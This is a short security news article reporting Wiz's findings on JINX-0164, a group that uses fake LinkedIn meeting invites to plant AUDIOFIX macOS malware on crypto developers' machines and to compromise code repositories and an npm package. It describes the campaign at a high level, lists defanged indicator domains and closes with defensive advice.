Hackers Exploit Fake LinkedIn Calls to Breach Crypto Developers’ Systems

A hacker group uses counterfeit LinkedIn invitations to install sophisticated macOS malware on crypto developers’ machines, compromising code pipelines and sensitive credentials.

Editorial Team · Jun 6, 2026 · 2 min read · Source: cryptopolitan.com

A targeted cyberattack campaign has compromised multiple cryptocurrency developers by impersonating legitimate contacts on LinkedIn and delivering malware through fake meeting links. The group behind these attacks, identified as JINX-0164, deploys custom macOS malware designed to infiltrate development environments and steal critical credentials.

Researchers from cloud security firm Wiz detailed the operation, revealing how JINX-0164 engineers fake meeting invites that lead victims to counterfeit video conferencing interfaces resembling Microsoft Teams. Once a developer clicks the malicious link, AUDIOFIX malware silently installs itself on their device without detection.

AUDIOFIX operates across both Intel and Apple Silicon Macs, posing as a system audio component to maintain persistence and communicate covertly with command servers over HTTPS. The malware exfiltrates a broad range of credentials, including saved passwords from the macOS Keychain, browser logins, SSH keys, cloud platform tokens for AWS, GCP, and Azure, and even sensitive cryptocurrency wallet data.

Unlike typical credential stealers, JINX-0164’s campaign uniquely targets crypto developers’ internal code repositories and continuous integration/continuous deployment (CI/CD) pipelines. Using stolen GitHub tokens, the attackers accessed internal secrets and pushed malicious code into trusted repositories by falsifying Git commit metadata.

This infiltration converts the victim organization’s own software development process into a vector for distributing malware to other developers who clone or build compromised codebases. In one detected incident, GitHub’s Vigilant Mode flagged suspicious commits lacking verified GPG signatures, indicating unauthorized code injections.

Further illustrating their reach, JINX-0164 conducted a confirmed supply chain attack on a widely used npm package. A trojanized version injected a hidden command fetching and executing MINIRAT—a Go-based lightweight backdoor enabling persistent, remote control over infected machines.

The command-and-control infrastructure linked to these attacks shares domains like datahub[.]ink and cloud-sync[.]online, with operators masking their locations using commercial VPN services such as Mullvad, Astrill, and ExpressVPN. While Wiz noted tactical similarities with North Korean threat clusters UNC1069 and Sapphire Sleet, no direct infrastructure connections were found.

This campaign highlights evolving threats in the crypto software ecosystem, where attackers compromise development pipelines not only to steal credentials but to propagate malware widely through trusted coding workflows. Developers are urged to exercise caution with unsolicited meeting requests and enhance code repository security practices, including robust token management and commit verification protocols.